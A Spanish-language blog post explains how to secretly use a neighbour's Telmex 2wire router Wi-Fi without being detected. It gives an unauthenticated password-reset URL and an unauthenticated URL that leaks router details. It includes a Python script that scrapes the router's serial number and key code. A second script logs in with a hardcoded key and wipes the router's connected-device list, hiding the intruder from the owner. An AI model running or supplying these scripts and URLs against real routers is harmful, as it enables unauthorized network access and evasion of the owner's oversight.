Hackeando modems routers 2wire de telmex - técnica borrado de caché

Hace un tiempo documente una técnica para la “Detección de intrusos en nuestra WI-FI“, hoy he decidido publicar una contra-parte, la parte obscura de como no ser detectado. Todo esto empezó con la historia que le paso a un amigo que solía tomar prestada la red de su vecino, continuación expongo su historia:

 

Esta historia realmente le paso a un amigo

 

Antes que nada el hacking no es la intromisión a un sistema, más bien es la comprensión profunda/detallada de tal sistema.

Todo esto me dejo pensando respecto al funcionamiento de estos routers y de como hacerle para no ser detectados, por otra parte he visto algunos documentos respecto a otras técnica por ejemplo:

Cambiando password o reseteando password en modem 2wire

Donde nos explican como al realizar una solicitud al routeador por medio de la URL:

Cambiando password o reseteando password en modem 2wire

http://home/xslt?PAGE=CD35_SETUP_01_POST&password1=****&password2=****

Al sustituir ***** podemos setear el password de dicho routeador.

para mas info de esta vulnerabilidad seguir reporte [http://seclists.org/bugtraq/2009/Aug/96]

Pero que pasa si lo reseteamos el router?, tendremos Internet pero solo durante un tiempo  pues el “vecino”(victima) se artara y nos pasara lo mismo que mi amigo “toma tu RED“.

En cambio podemos pasar desapercibidos si tan solo borramos la cache del routeador, así cuando el vecino visite la pagina del sitio no vera ninguna maquinas conectada lo cual tal vez le intrigue un poco pero notara que tiene Intenet. por otra parte con el script que publique anteriormente pasara lo mismo pues este extrae la información de la misma pagina.

Sin más la dirección para borrar la cache es la siguiente:

http://home/management/xslt?PAGE=J21_NODE_RESET&RESET_PAGE=J21_NODE_RESET&THISPAGE=J21&NEXTPAGE=J21_NODE_RESET

Donde la URL /management/ refiere a un prefijo administrativo, en otras palabras es necesario logearse para acceder a dicha URL.

Debraye de análisis

–¿por que? es mas fácil resetear el password(no requiere autenticación) que borrar el cache…

En concreto no lo se, pero lo que si es obvio es que nos encontramos ante un problema grave en el diseño de estos routeadores, pues no creo que fuera su intensión el que existieran posts como este en donde se expone sus errores

Si partimos de  las  2 suposiciones respecto a la ruta que resetea el password:

1.- Se les paso incluir tal ruta a la sección q requiere autenticación /management/

2.- Así lo planificaron.

Si se les paso seria un error IMPERDONABLE!, lo cual me quedan mis dudas, yo opto más por la 2da que así lo planificaron dada su falta de experiencia o capacidad pues:

“No encontraron una forma segura  de como resetear la contraseña sin la necesidad de una autenticación previa”.

Y decidieron dejarlo así, subestimando a los usuarios y con la esperanza que nadie indague en sus sistemas.

Eso habla muy mal de ellos ya que normalmente los buenos routers consideran las interfaces de acceso físico(como cable consola y este caso interfaz ethernet) únicas para realizar tales tareas.

Consiguiendo la información del router:

Para acceder a la información no es necesario autenticarte, la pagina 7 es la que muestra al información al cual puedes acceder desde URL que te de acceso a tal información es:

http://home/xslt?PAGE=A07

Bien ahora si nos ponemos un poquito creativos, podemos hacer un script que automatice un poco tal acción y podemos acceder a dicha información sin salirnos de nuestra terminal:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
#Muestra la configuración de los ruteadores 2wire de telmex(bastante comunes)
#La salida es en un formato de XML

import urllib2, urllib
import re
ROUTER = "http://192.168.1.254"

MANAGEMENT = 'management'
DS = '/'
#en la pág. 07 esta la información de estos routers
PAGE = "A07"
#Preparamos/abrimos 1conexión para "leer" la pág. de la info del router
opener = urllib2.Request(ROUTER+DS+"xslt?PAGE=A07",None,{})
response = urllib2.urlopen(opener)
response = response.read()
#obteniendo el nombre del routeador
expr  = re.compile('\<td\sclass\=\"textmono\"\>([a-zA-Z\-0-9\.\s]+)\<\/td\>')
model = expr.findall(response)
#obtenemos los demas datos del router
expr  = re.compile('\<td\sclass\=\"data\"\>([a-zA-Z\-0-9\.\s]+)\<\/td\>')
data = expr.findall(response)

#las posiciones en la lista model definen la variable, ya que estan en función de como aparecen en la página
print """\
<?xml version="1.0"?>
<config>
<title>Demo Config</title>
	<router>
		<model>"""+model[0]+"""</model>
		<serial_number>"""+data[0]+"""</serial_number>
		<version_hardware>"""+data[1]+"""</version_hardware>
		<version_software>"""+data[2]+"""</version_software>
		<key_code>"""+data[3]+"""</key_code>
	</router>
</config>
"""

Este script esta disponible en: http://gist.github.com/619905

A partir de dicha información puedes ver los reportes para ver que vulnerabilidades tiene.

Pasar desapercibido borrando la cache del router

En cambio ya conseguiste el acceso a la configuracion del router lo que puedes hacer es borrar la información del cache cada determinado tiempo.

Si deseas visitar la url para borrar la cache el router no te lo permite ya que antes requieres identificarte, entonces previamente tienes que hacerlo y posteriormente resetear la cache.

Esto suele ser algo tedioso, así que decidí hacer un script que automatiza tal proceso(logearte y borrar la cache) y no les pase lo de mi amigo:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
#       Copyright 2010 Fitorec - <http://fitorec.wordpress.com>
#       2wireResetCache.py
#        ____      _                             .--.
#       | __ |(_) | |  ___   ____ ___   ____   | o_o |
#       | | _ | ||_ _|/ _ \ / __// _ \ / __/   | :_/  |
#       | __ || | | || (_) || | |  __/| (__   //      \\
#       |_|   |_| | | \___/ |_|  \___/ \___( (|        | )
#          http://fitorec.wordpress.com      /'\_      _/
#                                            \___)=(___/
#	Una ves conectado podemos pasar desapercibidos ante el administrador
#	de la red solo hay que revisar si existimos en el cache del router
#	si es así borramos el cache del router dejándolo vació como si no
#	hubiera ninguna máquina conectada a el.
#	se considera que la IP del router es 192.168.1.254 caso contrario cambiar
#	linea 24,también es necesario conocer la key del router (tip:normalmente los
#	usuarios inexpertos le suelen poner la misma que la clave WEB) y sustituir
#	dicha clave en la linea 24

import urllib2, urllib
import re
""" IP  y contraseña """
KEY	   = "7972247120"
ROUTER = "http://192.168.1.254"

#------------------------
MANAGEMENT = 'management'
DS = '/'
PAGE = "A02_POST"
THISPAGE = ""
NEXTPAGE = "J01"
CMSKICK = ""

def resetLanCache(password):
	cookie_h = urllib2.HTTPCookieProcessor()
	opener = urllib2.build_opener(cookie_h)
	urllib2.install_opener(opener)
	ua = 'Mozilla/5.0 (X11; U; Windows seven; es-ES; rv:1.9.0.11)'
	ua += ' Gecko/2009061118 Windows seven Firefox/3.0.11'
	h = {"User-Agent": ua}
	params = urllib.urlencode({"PASSWORD": password, "PAGE" : PAGE, "THISPAGE"  : THISPAGE, "NEXTPAGE" : NEXTPAGE, "CMSKICK" : CMSKICK})
	r = urllib2.Request(ROUTER+DS+MANAGEMENT+DS+"xslt", headers=h)
	f = urllib2.urlopen(r,params)
	reset = urllib2.Request(ROUTER+DS+MANAGEMENT+DS+"xslt?PAGE=J21_NODE_RESET&RESET_PAGE=J21_NODE_RESET&THISPAGE=J21&NEXTPAGE=J21_NODE_RESET",None,{})
	f = urllib2.urlopen(reset)
	htmlContent = f.read()
	f.close()

opener = urllib2.Request(ROUTER,None,{})
response = urllib2.urlopen(opener)
response = response.read()
#obteniendo el nombre de las maquinas
expr  = re.compile('\<span\sclass\=\"textmono\"\>([a-zA-Z\-0-9\.\s]+)\<\/span\>')
compus = expr.findall(response)
#los dos primeros elementos son falsos y los quitamos
compus = compus[2:]
print 'Maquinas conectadas'
if len(compus)>0 :
	print "vamos a borrar las sig. maquinas"
	print compus
	resetLanCache(KEY)

 

fin

 

Espero les sirva!.

P.D.  Existen técnicas por si eres el vecino y quieres atrapar a mi amigo, publicare una la próxima semana, bytes!!.

About these ads